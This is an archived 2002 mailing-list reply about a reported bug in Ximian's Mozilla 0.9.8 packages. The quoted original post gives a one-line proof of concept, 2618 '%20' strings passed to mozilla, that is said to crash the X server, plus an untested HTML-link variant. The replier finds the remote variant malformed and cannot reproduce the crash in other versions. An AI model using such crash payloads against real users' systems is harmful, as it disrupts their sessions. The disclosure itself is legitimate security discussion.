Vulnerability Development mailing list archives
Re: Ximian Mozilla: The 2618 Bug
From: NyQuist <NyQuist () ntlworld com>
Date: 17 Feb 2002 17:48:17 +0000
On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
> NOTE TO THE MODERATOR: This was sent yesterday but I guess didn't make it
> since this doesn't seem to affect redhat itself, it affects the mozilla
> packages distributed by Ximian:
>
> The test system looks like:
>
> bash#~ rpm -qa | grep mozilla
> mozilla-0.9.8-1.ximian.2
> mozilla-mail-0.9.8-1.ximian.2
> mozilla-xmlterm-0.9.8-1.ximian.2
> mozilla-devel-0.9.8-1.ximian.2
> nautilus-mozilla-1.0.6-ximian.4
> mozilla-psm-0.9.8-1.ximian.2
> kdebindings-kmozilla-2.1.1-1
>
> This was tested in both RH7.1 and 7.2 with Ximian Gnome (with all the
> updates).
>
> There is a bug in mozilla 0.9.8-1 which allows you to crash the X server.
> I won't go into details, I'll just show the proof of concept.
>
> exploit:
>
> Local:
>
> bash#~ mozilla `perl -e "print '%20' x 2618"`
>
> Remote:
>
> I haven't tested this but I guess:
>
> echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >> ./attack.html
>
> perhaps using "img src" or java script...
>
> Best Regards
>
> --
> /*
> Rodrigo Gutierrez <rodrigo () trustix com>
> Trustix AS
> http://www.trustix.com
> */

On one box:

rpm -qa | grep mozilla
mozilla-chat-0.9.7-1
mozilla-mail-0.9.7-1
nautilus-mozilla-1.0.6-ximian.6
mozilla-0.9.7-1
mozilla-devel-0.9.7-1
mozilla-js-debugger-0.9.7-1
mozilla-psm-0.9.7-1
mozilla-dom-inspector-0.9.7-1

Results in "www.perl -e "print %20 x 2618".com could not be found" (lol)

perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't overflow perl.

On other box:

rpm -qa | grep mozilla
nautilus-mozilla-1.0.6-ximian.6
mozilla-psm-0.9.8-2
mozilla-0.9.8-2
mozilla-devel-0.9.8-2

Results in same 'not found' error.

The attack.html (as per your script) results in "www.'perl not found".

So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in 0.9.8-2.

--
NyQuist | Matthew Hall -- NyQuist at ntlworld dot com
Sig: Microsoft sells you Windows. Linux gives you the whole house.